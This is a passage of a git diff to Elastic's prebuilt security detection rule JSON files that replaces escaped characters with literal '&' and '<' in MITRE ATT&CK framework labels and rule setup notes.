populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json index e35a51e28dd..d5484e3c6c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json index 4a9b0cc9a81..c24c6f01009 100644 --- a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json +++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json index 1ef9dc81916..3ba866eb0da 100644 --- a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json +++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json index a4af55da1fb..a00dbeb2f7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json index 5c6fc677258..7ef2cd4f5d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json index a484bc3e831..9e22db362f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json index 0ba179162f2..d79bf795c54 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json index 0bb03522761..086e16770ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json index b2121548743..e82dad0a3cd 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json index 7f00d16b41c..daba4ddef4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json index 9f695592ac4..e9c09cecd2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json index 4780d9ccdf3..25391388ac1 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json index 0461f080cb0..080ced962fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json index efe0af6757d..6e558cfde68 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json +++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -75,7 +75,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json index 413e398dc5d..4e4eb4a6b3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json +++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json index 70a7ca9e8b1..ef845481e47 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -71,7 +71,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json index 860f43736f2..d5c8f7eede3 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -78,7 +78,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json index 6b8e27c8ce0..fdd7b6f99e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json index fe44b5ad254..3a2f56f61d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json index 846d839b07a..f49618db0f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json index 43eaff829d7..3e2dc88d43d 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json index 7628328e248..fd2cf2509f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json index cda216987f9..9f086fb5751 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json index de51c103ceb..907e685d9b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json index bb08b878b52..0db4260bf92 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json index 0731824854e..bf7c1fccb05 100644 --- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json index 3beba52926f..1fcf340093d 100644 --- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json index 1976c7eefc4..4408d9c995c 100644 --- 